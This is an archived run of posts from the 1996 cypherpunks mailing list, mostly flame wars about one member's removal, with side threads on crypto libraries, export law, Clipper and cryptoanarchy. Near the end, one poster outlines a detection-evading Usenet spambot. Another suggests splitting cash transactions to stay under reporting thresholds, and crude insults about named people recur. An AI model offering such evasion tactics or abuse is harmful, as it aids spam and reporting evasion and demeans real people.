Is that what you had in mind when you repeatedly asked John Gilmore to remove
me from his mailing list, Ray?  You made both of you look like real assholes.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 24 Dec 1996 08:42:19 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Both John Gilmore and Ray Arachelian are liars
In-Reply-To: <T59eZD46w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961224113856.19793B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> Ray Arachelian <sunder@brainlink.com> writes:
> 
> > On Mon, 23 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
> >
> > > John Gilmore unsubscribed me from this mailing list (in a very rude manner)
> > > and I am not allowed to resubscribe. I am not subscribed to this mailing li
> >
> > Funny, you post messages here, you read messages from here, IMHO, you
> > haven't been unscumscribed.
> 
> Now you're calling John Gilmore a liar, because he admitted pulling my plug:

<... deletia...>

Right, I agree that you have been removed from majordomo's list of 
"subscribers" however you haven't been removed in as much as you can 
still read the list and in as much as you can post messages.  

So what is the difference were you subscribed?  Were you subscribed you 
could also post and read messages.  Now that you are unsubscribed, you 
can also post and read messages.  What's the difference?

Whatever Mr. Gilmore did made no differece.  You still read.  You still 
post.  If he wanted to totally remove you, you wouldn't be able to post 
at all.  Yet, you still do.  The rumors of your forced unsubscription are 
clearly greatly exaturated.

> Note that John clearly unsubscribed me because he didn't like the contents
> of my messages. Later Timmy May claimed that it had something to do with the
> size of my submissions (another lie).

And yet, you post to cypherpunks@toad.com, and you read messages from 
cypherpunks@toad.com. QED: You're still here.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 24 Dec 1996 08:50:02 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: MCIP?
Message-ID: <199612241646.LAA15417@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


I have on an old account being closed, most of the traffic from the
Mac Crypto Interface Project mailing list.

Does anyone want them?

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 24 Dec 1996 11:54:36 -0800 (PST)
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: Ebonics
In-Reply-To: <Pine.SUN.3.91.961224114532.19793C-100000@beast.brainlink.com>
Message-ID: <32C033F3.4849@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian wrote:
> On Mon, 23 Dec 1996, Dale Thorn wrote:
> > Dr. Vulis has in fact been forcibly unsubscribed.  He's on my "who
> > cypherpunks" list as of 12 Oct 1996, but does not appear as of
> > 04 Nov, 30 Nov, and 18 Dec, when I last asked for a list.

> As far as majordomo is concerned, - yes.  However, there are those who
> subscribe invisible and therefore wouldn't show up when you say "who
> cypherpunks" to majordomo@toad.com.

I subscribed to this list at the recommendation of someone else, and at
the time it was my first experience on the "new" Internet, i.e., browsers
and such (three years ago when I got on and off it was numeric menus only
as far as I know).  It's interesting to me how many ways there are to do
things, and how many ways there are to get around them.

For example, there must have been more than one way Gilmore could have
dealt with Dimitri (he chose the worst), and there must have been several
ways Dimitri could get around the ban (he chose a very easy methodology,
apparently, which sure makes me wonder what Gilmore was trying to do).

> It's not a question that he found a way to read from and post to the
> cypherpunks list.  He hasn't been prevented from doing so, therefore his
> unsubscription hasn't been enforced, so he's still here.

Hasn't been enforced?  Are you saying that Gilmore is trying to tell us:
"Hi, I'm John Gilmore. I'm cutting Dr. Vulis off the list, but actually,
I'm not cutting him off. Hee hee." (April Fools, or something like that).
I can handle the humor, if that's what you're getting at.

> If before he was unsubscribed he was able to post messages and read
> messages, and now that he's unsubscribed he's able to post messages and
> read messages, what's the difference to the rest of us on the list?  As
> far as we can see, he's still subscribed.  Never mind that he gets his
> messages from usenet or elsewhere, he's still here.  There is NO
> difference to the rest of cypherpunks.

Well, if there was *no* difference, why was there so much traffic on it?
I dare say that that thread was the biggest (and most divisive) of all time.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 24 Dec 1996 08:48:31 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Ebonics
In-Reply-To: <32BF2E0C.303D@gte.net>
Message-ID: <Pine.SUN.3.91.961224114532.19793C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Dec 1996, Dale Thorn wrote:

> Dr. Vulis has in fact been forcibly unsubscribed.  He's on my "who
> cypherpunks" list as of 12 Oct 1996, but does not appear as of
> 04 Nov, 30 Nov, and 18 Dec, when I last asked for a list.

As far as majordomo is concerned, - yes.  However, there are those who 
subscribe invisible and therefore wouldn't show up when you say "who 
cypherpunks" to majordomo@toad.com.
 
> The fact that he still reads the list and does posts only adds to the
> arguments against censorship, specifically John Gilmore's censorship.
> (This has got to be embarrassing for Gilmore, hee hee.  I'll bet he
> practices keeping a straight face in front of a mirror, in case anyone
> brings it up in person.)

I will not argue on John's reaction since I do not know him, nor have I 
met him, however, the fact that Vulis posts and reads cypherpunks means 
he's still here.

> If, as has been said, assassination is the ultimate form of censorship,
> then Dr. Vulis has been shot, stoned, beat on, and cement-booted, but
> he still lives and is a thorn (no pun intended) in the side of would-
> be censors on the Internet.

If he had been ultimatly censored, shot, stoned, beat on, and 
cement-booted, he certainly wouldn't be able to post.  He's still here. 
So the above is bullshit.

It's not a question that he found a way to read from and post to the 
cypherpunks list.  He hasn't been prevented from doing so, therefore his 
unsubscription hasn't been enforced, so he's still here.

If before he was unsubscribed he was able to post messages and read 
messages, and now that he's unsubscribed he's able to post messages and 
read messages, what's the difference to the rest of us on the list?  As 
far as we can see, he's still subscribed.  Never mind that he gets his 
messages from usenet or elsewhere, he's still here.  There is NO 
difference to the rest of cypherpunks.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 09:24:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The LIST
In-Reply-To: <32BFD210.146C@sk.sympatico.ca>
Message-ID: <q30FZD63w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Carl Johnson <toto@sk.sympatico.ca> writes:

> Ross Wright wrote:
> >
> > Yes, Dr., this latest tripe that has spewed forth from Tim's keyboard
> > reeks of bigotry.  And all this time I felt you may have been too
> > hard on him.  This latest rant of his has made me reconsider your
> > rough treatment of Mr. May.  I kinda think he deserves a slapping
> > right now.
>
>   Supporting Dr. DV K, are we?

Uh-oh - Ross, good buddy, we've been outed.

>   OK, pal, now your on the LIST, too.

Do you mean Timmy May's "don't hire" list?

]Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id PAA22273 for cypherpunks-outgoing; Thu, 7 Nov 1996 15:56:53 -0800 (PST)
]Received: from you.got.net (root@scir-gotnet.znet.net [207.167.86.126]) by toad.com (8.7.5/8.7.3) with ESMTP id PAA22268 for <cypherpunks@toad.com>; Thu, 7 Nov 1996 15:56:27 -0800 (PST)
]Received: from [207.167.93.63] (tcmay.got.net [207.167.93.63]) by you.got.net (8.7.5/8.7.3) with ESMTP id PAA09096 for <cypherpunks@toad.com>; Thu, 7 Nov 1996 15:49:39 -0800
]X-Sender: tcmay@mail.got.net
]Message-Id: <v03007803aea827844e20@[207.167.93.63]>
]In-Reply-To: <2.2.32.19961107221247.0069347c@smtp1.abraxis.com>
]Mime-Version: 1.0
]Content-Type: text/plain; charset="us-ascii"
]Date: Thu, 7 Nov 1996 16:00:23 -0800
]To: cypherpunks@toad.com
]From: "Timothy C. May" <tcmay@got.net>
]Subject: Vulis now on the "Don't Hire" list
]Sender: owner-cypherpunks@toad.com
]Precedence: bulk
]
]At 5:12 PM -0500 11/7/96, Alec wrote:
]
]>:This opens up the potential, for example, for Tim May to sue the operator of
]>:the Cypherpunks mailing list now for posts from users (even anonymous ones)
]>:which defame or otherwise liable his character, reputation, or ability to
]>:pursue income in his chosen field.
]>
]>PLEASE, let's not drag poor Tim into this. Hasn't he suffered enough?!
]>This does not follow even from the tortured logic above.
]
]And, indeed, it is not likely to be who suffers in the job market as a
]result of Dr. Vulis' rants and raves and generally insane postings; my
]situation is secure, but I understand that Vulis has joined L. Dettweiler
]on the "List of Unemployables" passed around Silicon Valley.
]
]I strongly doubt many computer companies in the Silicon Valley will be
]willing to hire him or his consulting service as his antics have received
]publicity.
]
]He may have his "NetScum" list and Web page, but it's his name on the list
]of folks not to hire.
]
]--Tim May
]
]"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
]that the National Security Agency would try to twist their technology."
][NYT, 1996-10-02]
]We got computers, we're tapping phone lines, I know that that ain't allowed.
]---------:---------:---------:---------:---------:---------:---------:----
]Timothy C. May              | Crypto Anarchy: encryption, digital money,
]tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
]W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
]Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
]"National borders aren't even speed bumps on the information superhighway."
]
]
]
]

I wonder if companies other than John Gilmore's "Cygnus Support" honors Timmy
May's list of unemployables. Of course, the way to get hired by Cygnus is to
give a blow job to John Gilmore while wearing a red ribbon on your scrotum.

By the way, the Net.Scum site that Timmy whines about is currently up at:

 http://www.fileita.it/webitalia/netscum

 http://www.lrcser.it/netscum

Check it out - several prominent "cypher punks" are described.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 24 Dec 1996 08:51:48 -0800 (PST)
To: admin@veracruz.net>
Subject: Re: Encryption Algorithms
In-Reply-To: <19961224073216350.AAA253@monalisa>
Message-ID: <Pine.LNX.3.95.961224113944.296A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 24 Dec 1996, Adam Breaux wrote:

> Is there a good source on the net for implemented C/C++ routines such 
> as a DES algorithm? I am a programmer in need of some fairly secure 
> encryption routine. Any help would be greatly appreciated.

SSLeay is a very complete encryption library.  It's at
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL.  There are several other packages
available on the usual crypto sites.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMsAKHSzIPc7jvyFpAQEGVAf/Sv0SnXPevi8xCB6mf6UH1QP+hDaz3lSi
00SUZo3xnvrcD8uREsATSWQ/8Prn4LPtRaCZfPBjd3Cc7t7woyvsXnsdj9kjA2G9
qtmv1vBAmRfdzZrc5dzyqIqkMmE/bA8g3TYC7wypoJvWpikHuO2wTSOTcQjIdnu+
DXTIUXAYlZIvtqY+FA/vU9hYxQ6h3BJiGySdN2j7x8BF3A0StCZGiNZzh4UidcpS
8uuO9u/gvs5yNZT0/naRU6TCAitA1VzSiNNJCrniXCeM+54sANdXy36lfxNLm9E9
CVnNfHCgHWHdFFX7HzHz+Rm/nBFMQvfgjQr6PPwlY8pJE0oPSeYUwQ==
=wgeQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Tue, 24 Dec 1996 12:00:25 -0800 (PST)
To: bobbi <cypherpunks@toad.com
Subject: Re: domestic laws/policies
In-Reply-To: <Pine.GSO.3.95.961223193517.6634C-100000@nunic.nu.edu>
Message-ID: <v03007811aee5e4fb78dd@[206.217.121.78]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:49 PM -0800 12/23/96, bobbi wrote:
>If I wanted to develop software that employs cryptography, or a
>new cryptographic algorithm, strictly for domestic use and sale, does this
>algorithm have to be registered with any domestic agency?

If your algorithm is only for domestic use, then there are no restrictions
and no need to register.  However, if even a single copy is illegally
exported, and even if there is no evidence that you helped in its export,
then you may experience a situation similar to Phill Zimmerman's where the
government persecuted him until the statue of limitations ran out.

However judge Patell's decision, if it is applied to you, may make the
export of an academic or even source code description of your algorithm
legal.  YMMV.

IMHO, the bottom line is that if you publish in this area you are stepping
onto a battle ground.  If you don't want any risk of getting shot at, the
only safe place is not publishing/selling.  If you do publish or sell, and
take reasonable precautions to stay within the law, you are fairly safe,
but government harassment can not be ruled out.


-------------------------------------------------------------------------
Bill Frantz       | Client in California, POP3 | Periwinkle -- Consulting
(408)356-8506     | in Pittsburgh, Packets in  | 16345 Englewood Ave.
frantz@netcom.com | Pakistan. - me             | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 24 Dec 1996 12:04:21 -0800 (PST)
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <Pine.BSF.3.91.961224111521.20821L-100000@mercury.thepoint.net>
Message-ID: <32C036F3.24D6@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Brian Davis wrote:
> On Tue, 24 Dec 1996, Blake Coverett wrote:
> > jonathon wrote:
> > >     Go shopping with a wad of $100.00 bills.   Most stores don't
> > >     accept them, regardless of the amount of purchase, without
> > >     additional ID.

> > I bought a new PC a few months ago with just shy of $7K worth of
> > $100 bills.  No one even blinked.

> Remember that if you go over 10K, the recipient is supposed to file a
> form 8300 with the IRS ....

Make sure that, unless you don't mind the FBI putting an extra monitor
on you, you don't *ever* transact $10k or more at one time, or on one
purchase in smaller increments over a relatively short period of time.
I know this because one of our customers in Encino was tagged this way
in 1983.  What was really hilarious was that they brought the equipment
in for us to have a look at, since we were experts on HP proprietary
gear and they weren't.  (Or we were a lot cheaper than HP corp.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Tue, 24 Dec 1996 12:11:08 -0800 (PST)
To: admin@veracruz.net
Subject: RE: Encryption Algorithms
Message-ID: <19961224201047358.AAA219@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


I've got some comments on this and pointers at 
http://www.program.com/resources/crypto.html and /source/crypto/index.html

(If any cypherpunks still give a shit about crypto I would appreciate any 
pointers to additional crypto resources on the net.)

>Adam Breaux (admin@veracruz.net) said 

>Is there a good source on the net for implemented C/C++ routines such 
>as a DES algorithm? I am a programmer in need of some fairly secure 
>encryption routine. Any help would be greatly appreciated.
>
>Thanks
>AdamX
>---
>Adam Breaux
>admin@veracruz.net
>http://www.veracruz.net       {Corporate Page }
>http://www.abyss.com          {Extracurricular}
>http://www.iso-america.com    {In Search Of...}
>
>"Violence is a cruel world doing what it 
>does best...break the habit...BE NICE" --- me.
>End of quote

--j
--------------------------------------------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending 
| me email with subject "send pgp key".
| www.Program.com is a good programmer web site.
--------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 09:31:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <Pine.SUN.3.91.961224114532.19793C-100000@beast.brainlink.com>
Message-ID: <y8agZD65w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:
> If before he was unsubscribed he was able to post messages and read
> messages, and now that he's unsubscribed he's able to post messages and
> read messages, what's the difference to the rest of us on the list?  As
> far as we can see, he's still subscribed.  Never mind that he gets his
> messages from usenet or elsewhere, he's still here.  There is NO
> difference to the rest of cypherpunks.

Your English isn't so good, Ray... I am not a "cypher punk", so you
shouldn't speak of "the rest of" "cypher punks".

If John's punitive action in response to my speech makes no difference to you,
then why did you ask him to do it, and why did you commend him afterwards?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 24 Dec 1996 12:19:36 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <199612240326.TAA29712@mail.pacifier.com>
Message-ID: <199612242019.MAA18186@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>You obviously (deliberately?) are misrepresenting May's comment above.  It 
>isn't that some kinds of evil are "no big deal":  It's that quantiatively, 
>refusing to accept a solution that would prevent, say, 100 deaths, simply 
>because it would cause _one_ DIFFERENT death is foolish and misguided.  
>
>If you feel inclined to deny this, consider the reverse situation:  Would 
>you approve of the saving of one life if it cost 100 lives?  (all things 
>being equal.)  While most people would feel uncomfortable being asked to 
>make decisions of this kind, that does not mean that one outcome is not 
>identifiably better than another.  

*I* am misrepresenting Timmy's statement?
please explain to me how anonymous extortion and kidnapping/ransom (what
Timmy was talking about) saves lives along the lines of the above 
reasoning...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 24 Dec 1996 12:26:18 -0800 (PST)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: clipper plans 4 sale (was Re: Earl Edwin Pitts, $224,000)
In-Reply-To: <199612170946.JAA00429@server.test.net>
Message-ID: <199612242026.MAA18998@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>In Ross Anderson's paper `Tamper Resistance - a Cautionary Note' (see
>http://www.cl.cam.ac.uk/~rja14/), there is a reference to the clipper
>chip having already been reverse engineered:
>
>Anderson writes: "We are reliably informed that at least one
>U.S. chipmaker reverse engineered the Clipper chip shortly after its
>launch."

that's really big news. what does this company plan to do with it?
note that reverse engineering would give the following benefits:

1. knowledge of the skipjack algorithm. supposedly the NSA based
a lot of security on it being secret-- they consider it so powerful
that no one should be able to use it for their own purposes. however
I wonder how much security they tried to invest in this scheme. the
#1 rule of crypto, of course, is to always assume your adversary
can get your algorithm.

2. given knowledge of the algorithm, people could use it for their
own purposes, or to make compatible clipper chips that don't use
key escrow.

of course, it would be interesting to see the govt response to
this reverse engineering. new laws? fines? imprisonment? frankly,
it would be fun to see them squirm like this.


CYPHERPUNKS-- this would be another big front page NYT article and
*severe* blow to the spook establishment if someone PUBLISHED this
algorithm in cyberspace.... just noting the obvious and not
encouraging anything ILLEGAL here, heh heh, <wink>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 24 Dec 1996 12:38:25 -0800 (PST)
To: omega@bigeasy.com
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <199612231530.JAA04229@bigeasy.bigeasy.com>
Message-ID: <199612242038.MAA20079@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



[timmy paraphrase]
>I thought the message was a pretty clear statement of opinion.  ie. 
>the deconstruction of democracy is a good thing and cryptoanarchy 
>will a enable a more just society.  (Some would argue more brutal as 
>well, but I think that the level of brutatlity in society would 
>change little from it's current levels.)

wow, what a ringing endorsement for cryptoanarchy, and quite Mayesque
in its style.

CRYPTOANARCHY!!! GO FOR IT!! IT PROBABLY WON'T BE ANY MORE
BRUTAL THAN THE WORLD IS ALREADY!!!

>So cut the crap and go ahead and argue for or against that thesis.

the cryptoanarchy thesis IS crap. everyone with a few brain cells to rub 
together is capable of seeing through this machiavellian dystopian trash
masquerading as a rational political philosophy.

anyone heard of "memes"? cryptoanarchy is a virus of weak minds without
any defense mechanisms. the cpunk list is the principal vector..

>(by the way.  Conveniently enough Tim May has put his ideas on the 
>web in quite a bit of detail.  Just put "cyphernomicon" in your 
>favorite web search engine)

gosh, thanks for the tip, Omegaman, hadn't heard anything about that--
I'll be sure to check that out. I certainly wouldn't want to prejudge
Mr. May's complex thesis, my profuse apologies if I misunderstood any
of the parts about extortion, kidnapping, tax evasion, anonymous
assassinations, etc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Tue, 24 Dec 1996 12:48:56 -0800 (PST)
To: Blake Coverett <cypherpunks@toad.com>
Subject: Re: Democracy, yeah right.
In-Reply-To: <01BBF1A9.AF9D0190@bcdev.com>
Message-ID: <v03007814aee5f1846c30@[207.93.129.120]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:49 AM -0800 12/24/96, Blake Coverett quoted:
>>From AP via MSNBC:
>
>       NEW YORK - The federal government has acknowledged
>  plans to prosecute doctors who prescribe marijuana and other
>  illegal drugs to seriously ill people under new laws approved by
>  voters in California and Arizona, The New York Times reported
>  Monday.

It is truly amazing what public servants will do to protect their jobs.

BTW - The largest single contributor, as of the last report required before
the election, to the California No on Medical Marijuana Initiative campaign
was the California Narcotics Officers Association. - San Jose Mercury News


-------------------------------------------------------------------------
Bill Frantz       | Client in California, POP3 | Periwinkle -- Consulting
(408)356-8506     | in Pittsburgh, Packets in  | 16345 Englewood Ave.
frantz@netcom.com | Pakistan. - me             | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 24 Dec 1996 13:05:36 -0800 (PST)
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: Both John Gilmore and Ray Arachelian are liars
In-Reply-To: <Pine.SUN.3.91.961224113856.19793B-100000@beast.brainlink.com>
Message-ID: <32C043C2.20E5@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian wrote:
> On Mon, 23 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
> > Ray Arachelian <sunder@brainlink.com> writes:
> > > On Mon, 23 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
> > > > John Gilmore unsubscribed me from this mailing list (in a very rude manner)
> > > > and I am not allowed to resubscribe. I am not subscribed to this mailing li

> And yet, you post to cypherpunks@toad.com, and you read messages from
> cypherpunks@toad.com. QED: You're still here.

This must be what is called a nonsequitur.  He can *always* be here,
one way or another.  That was never the point.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 24 Dec 1996 09:55:36 -0800 (PST)
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: Ebonics
In-Reply-To: <Pine.SUN.3.91.961224114532.19793C-100000@beast.brainlink.com>
Message-ID: <Pine.LNX.3.95.961224125036.581B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 24 Dec 1996, Ray Arachelian wrote:

> > If, as has been said, assassination is the ultimate form of censorship,
> > then Dr. Vulis has been shot, stoned, beat on, and cement-booted, but
> > he still lives and is a thorn (no pun intended) in the side of would-
> > be censors on the Internet.
> 
> If he had been ultimatly censored, shot, stoned, beat on, and 
> cement-booted, he certainly wouldn't be able to post.  He's still here. 
> So the above is bullshit.

It's extremely trivial to prevent someone from posting to a mailing list.  The
fact that John Gilmore has not done this probably means that he doesn't want to
rather than an inability to do the above.

> It's not a question that he found a way to read from and post to the 
> cypherpunks list.  He hasn't been prevented from doing so, therefore his 
> unsubscription hasn't been enforced, so he's still here.

Anyone can read cypherpunks and there's not much anyone can do to prevent
someone from receiving list traffic.  However, this doesn't really matter.  An
ISP that pulls the plug on a spammer doesn't try to prevent that person from
reading or posting to that newsgroup.  That person won't be able to do it
using the ISP's resources.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMsAZzCzIPc7jvyFpAQGZcggAgDP3Tz9tmMEe0zuvFzTLKiQZ8nlYPxby
8HlqoUSbgNpy31b8JvLvT7Ir8C3xn7WL4/E1S3AnV1s/TMojM+KCxT/iwC8ZDeh1
7Cyx3BVdp/fUSQxQs6fRnS/bLAlkbntbnJzMQEEBmVmX5nn8ACB9RY3u04Fd8els
JoWXpNPdIUPYo61MHXQbSiHws/6O3yRDlJsQr8rokINjslazBbA+1DPTJfgPu4si
ffXDtUEjEHC+MyHzvA0ablhLc9TL5R5Vc5DL6dhQNfRP8ow9EggUcG0EuHupefcC
Q09FIWKYwv0P1oPwIGUGY3lJEPQadw45lrXjs7/KnGKfhvGR/eNjRg==
=4KOs
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 10:50:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The LIST
In-Reply-To: <199612241821.KAA04522@adnetsol.adnetsol.com>
Message-ID: <9qegZD71w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ross Wright" <rwright@adnetsol.com> writes:

> On or About 24 Dec 96 at 11:52, Dr.Dimitri Vulis KOTM wrote:
>
> > Carl Johnson <toto@sk.sympatico.ca> writes:
> >
> > > Ross Wright wrote:
> > > >
> > > > Yes, Dr., this latest tripe that has spewed forth from Tim's
> > > > keyboard reeks of bigotry.  And all this time I felt you may
> > > > have been too hard on him.  This latest rant of his has made me
> > > > reconsider your rough treatment of Mr. May.  I kinda think he
> > > > deserves a slapping right now.
> > >
> > >   Supporting Dr. DV K, are we?
>
> On or About 24 Dec 96 at 11:52, Dr.Dimitri Vulis KOTM wrote:
>
> >
> > Uh-oh - Ross, good buddy, we've been outed.
>
> Yes, my tolerance of humanity has been brought to the forefront!  I
> can only hope it only goes as far as the "punks" on this list.  It
> would not look good for a salesman like myself to be known as a
> tolerant person.

Ross, let's write a good Usenet spambot. The ones out there suck because
they go through newsgroups alphabetically and post the same crap all at
once. Then they get detected and cancelled by assholes like Chris Lewis.

A good spambot would cover all unmoderated newsgroups, look for traffic,
pretend to follow up on postings from actual people, say something on-topic,
and post your message, but vary it randomly, so it's almost never the same.

I think we can make a pretty good program. "Cypher punks" don't write code,
but we do.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 10:50:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Legality of requiring credit cards?
In-Reply-To: <c=US%a=_%l=TGIEXCH-961224155706Z-2446@TGIEXCH.terraglyph.com>
Message-ID: <94egZD72w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike Topalovich <TOPALOVICH@terraglyph.com> writes:
> It's not necessarily because you are paying with $100 bills.  The IRS
> requires banks and other businesses to report all cash transactions
> exceeding $10,000 by means of a Currency Transaction Report (CTR).  This
> is a way for the IRS to track money laundering.  There happens to be two
> lines on the form asking for the number of $50 and $100 bills, but those
> lines are optional.

They're supposed to report "suspicious" cash transactions under 10K too.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Tue, 24 Dec 1996 13:33:57 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Let's write a good Usenet spambot
Message-ID: <199612242133.NAA08613@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 24 Dec 96 at 13:33, Dr.Dimitri Vulis KOTM wrote:

> 
> Ross, let's write a good Usenet spambot. The ones out there suck
> because they go through newsgroups alphabetically and post the same
> crap all at once. Then they get detected and cancelled by assholes
> like Chris Lewis.

Yeah, those assholes are getting in the way of my first amendment 
right to spam the fuck out of anyone and everyone I fucking want 
to!!!!  

My hero, Larry Flint, says "The price of freedom of speech is 
tolerance of other people's views.:  So everyone can Fucking 
tolerate as much spam as a spamming robot can be told to spew!!!

> 
> A good spambot would cover all unmoderated newsgroups, look for
